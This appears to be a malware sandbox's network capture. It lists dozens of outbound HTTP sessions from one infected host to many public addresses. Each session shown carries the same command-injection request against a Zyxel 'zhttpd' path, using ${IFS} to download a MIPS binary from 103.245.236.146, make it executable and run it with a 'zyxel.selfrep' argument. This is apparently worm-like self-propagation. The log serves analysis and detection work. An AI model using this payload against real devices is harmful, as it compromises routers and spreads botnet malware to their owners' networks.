                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7624192.168.2.2335486184.0.235.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994849920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7625192.168.2.235644614.155.144.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994873047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7626192.168.2.235586699.124.17.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994889021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7627192.168.2.2335738111.76.75.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994925022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7628192.168.2.2344330167.127.194.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994929075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7629192.168.2.2359316116.70.56.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994946003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7630192.168.2.2355398180.249.100.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994960070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7631192.168.2.2352474165.188.100.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.994992971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7632192.168.2.235425696.93.57.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995049000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7633192.168.2.2333682178.106.19.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995075941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7634192.168.2.2340838124.24.183.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995095968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7635192.168.2.2333070155.217.234.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995126963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7636192.168.2.2358838152.46.0.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995126963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7637192.168.2.235922860.77.106.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995204926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7638192.168.2.235145650.209.247.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995239019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7639192.168.2.2339146155.163.130.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995239019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7640192.168.2.2341452220.184.237.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995266914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7641192.168.2.2347342164.102.253.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995300055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7642192.168.2.2334258113.46.137.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995311022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7643192.168.2.234897249.132.84.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995364904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7644192.168.2.234350646.37.42.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995371103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7645192.168.2.2343936178.231.5.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995392084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7646192.168.2.2333678212.48.215.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995402098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7647192.168.2.2345226154.137.79.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995433092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7648192.168.2.234199634.63.109.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995464087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7649192.168.2.235382678.174.16.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995500088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7650192.168.2.235072289.242.188.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995507956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7651192.168.2.2338406218.89.158.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995527983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7652192.168.2.2353648189.101.175.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995549917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7653192.168.2.2356738153.244.193.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995573997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7654192.168.2.234274642.186.3.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995605946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7655192.168.2.2334656131.209.162.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995639086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7656192.168.2.2335106178.175.200.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995672941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7657192.168.2.2333390109.8.75.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995723963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7658192.168.2.2356970112.166.44.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995733023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7659192.168.2.2337268150.70.93.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995767117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7660192.168.2.2351674165.8.26.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995784044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7661192.168.2.2351634213.245.32.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995805979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7662192.168.2.2354980105.184.76.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995842934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7663192.168.2.234005837.226.222.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995867014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7664192.168.2.2335446110.115.147.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995903969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7665192.168.2.23424162.187.18.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995929003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7666192.168.2.235188486.248.188.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995946884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7667192.168.2.233769020.218.137.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.995990038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7668192.168.2.235106417.235.31.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996026039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7669192.168.2.2339550207.77.167.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996051073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7670192.168.2.2357932107.208.36.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996073008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7671192.168.2.2336214148.59.56.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996092081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7672192.168.2.2343216179.120.35.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996138096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7673192.168.2.235518638.95.253.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996160030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7674192.168.2.2351032175.34.144.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996185064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7675192.168.2.235102813.44.77.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996227980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7676192.168.2.2334702203.89.27.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996258020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7677192.168.2.2351556196.224.34.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996289015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7678192.168.2.2353342185.121.73.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996294022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7679192.168.2.236059423.120.126.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996320009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7680192.168.2.235303423.87.9.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996345043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7681192.168.2.235866054.131.208.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996375084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7682192.168.2.234032654.16.204.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996403933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7683192.168.2.2345946154.92.140.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996442080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7684192.168.2.234845044.28.76.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996491909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7685192.168.2.2358022199.0.246.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:37.996510983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7686192.168.2.234175461.4.233.167443
                                                TimestampBytes transferredDirectionData
